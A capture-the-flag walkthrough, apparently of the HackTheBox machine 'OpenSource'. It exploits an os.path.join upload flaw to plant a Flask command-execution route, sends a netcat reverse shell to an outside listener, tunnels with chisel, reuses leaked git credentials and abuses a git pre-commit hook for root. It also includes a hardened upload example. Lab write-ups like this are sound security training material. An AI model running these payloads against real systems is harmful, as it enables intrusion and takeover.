```
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
3000/tcp filtered ppp
```
We’ll start with the web server then…

Immediately we’re given the option to “Download the Source Code”, which appears to be a Docker image of the application, and to test the upload functionality.

The source ships with its .git directory, so git branch shows us two branches, dev and public. Looking through git log dev we can see the commits, and diffing the changes we come across some apparent creds committed in what looks like a VS Code settings file:

```
"python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
+ "http.proxy": "http://dev01:Soulless_Developerfirstname.lastname@example.org:5187/",
+ "http.proxyStrictSSL": false
```
Sadly these creds do not work for SSH, so no easy access that way.

It’s also not as easy as uploading a PHP reverse shell: this is a Flask app, and the web server serves uploaded files back rather than executing them.

While enumerating directories we find an interactive console (the Werkzeug debugger), locked behind a PIN.

While poking around the upload app I trigger an error message that names the file handling uploads, and we can read that file in its entirety in the source we downloaded.

Essentially, because the upload path is built with os.path.join, and os.path.join discards every preceding component as soon as it meets an absolute one, a filename supplied as an absolute path is used verbatim as the destination. That means we might be able to overwrite views.py on the server by intercepting the upload in Burp and editing the filename in the multipart request.
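To make the os.path.join behaviour concrete, here is an added example (not code from the original post or from the target application) that puts the vulnerable join beside a hardened version. The upload directory /app/public/uploads and the target path /app/app/views.py are assumptions for illustration, as the post gives no paths; posixpath is used explicitly so the result is identical on any host (on Linux os.path is posixpath).

```python
import posixpath

# Assumed container layout (the post does not give the real paths).
UPLOAD_DIR = "/app/public/uploads"


def vulnerable_upload_path(filename):
    """The pattern described in the post: the client-controlled filename from the
    multipart Content-Disposition header goes straight into a path join.
    posixpath.join drops every earlier component once it meets an absolute one,
    so "/app/app/views.py" becomes the destination verbatim."""
    return posixpath.join(UPLOAD_DIR, filename)


def safe_upload_path(filename):
    """Hardened version: accept only a bare file name, then verify the
    normalised result still lives inside UPLOAD_DIR (defence in depth)."""
    if "/" in filename or "\\" in filename or filename in ("", ".", ".."):
        raise ValueError(f"rejected filename: {filename!r}")
    candidate = posixpath.normpath(posixpath.join(UPLOAD_DIR, filename))
    if posixpath.commonpath([UPLOAD_DIR, candidate]) != UPLOAD_DIR:
        raise ValueError(f"path escapes upload directory: {candidate}")
    return candidate


def is_rejected(filename):
    """True if the hardened handler would refuse this filename."""
    try:
        safe_upload_path(filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample filenames: a normal upload, a relative traversal,
    # and the absolute path trick used against the box.
    for name in ["shell.png", "../../app/views.py", "/app/app/views.py"]:
        print(f"{name!r:24} vulnerable -> {vulnerable_upload_path(name)}")
        hardened = "rejected" if is_rejected(name) else safe_upload_path(name)
        print(f"{'':24} hardened   -> {hardened}")
```

Note that the relative traversal is only half-handled by the vulnerable join: the ".." components survive in the string and the filesystem resolves them at write time, which is why normalising and then checking the common prefix matters in the hardened version.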
Adding the following route to views.py (os and request are already imported at the top of that file) lets us send commands to the server via curl and, hopefully, get a shell…

```python
@app.route('/shell')
def cmd():
    # os.system returns the exit status, not the output; wrapping it in str()
    # keeps Flask from rejecting the response after the command has run.
    return str(os.system(request.args.get('cmd')))
```

```
curl 'http://10.129.227.140/shell?cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202>%261|nc%2010.10.14.94%201234%20>/tmp/f'
```
We’re stuck in a docker container now, but from inside it we can have a look at what was running on port 3000 (filtered from the outside) by tunnelling it back to Kali with chisel:

```
# On Kali
./chisel server -p 9999 --reverse

# On the box
./chisel client 10.10.14.94:9999 R:3000:172.17.0.1:3000
```

It’s running Gitea. ExploitDB lists an RCE for it, so perhaps we’ll be able to get outside of this container… Let’s see if the Git creds we grabbed earlier work.
So, thankfully, dev01 has backed up their home folder to Gitea, and it contains an SSH private key…

```
Last login: Mon May 16 13:13:33 2022 from 10.10.14.23
dev01@opensource:~$ ls
user.txt
```

Now we can log in through SSH and instantly grab the user flag. Time to enumerate.
After a lot of digging around I boot up pspy to see what processes are running, and see root running a git commit in /home/dev01 that pushes it to the Gitea server we accessed earlier.

When reading about CVEs for Gitea we learned about Git hooks: they are plain executables that live in the .git/hooks folder, are not tracked by git, and run as whichever user invokes git. Since root is the one running git commit in /home/dev01, and dev01 owns that directory, a bash reverse shell dropped in as a hook should get us a root shell.

Creating a pre-commit hook means it fires every time the cron job’s git commit runs.
And on our listener we catch a shell. Straight to the root flag and the box is done.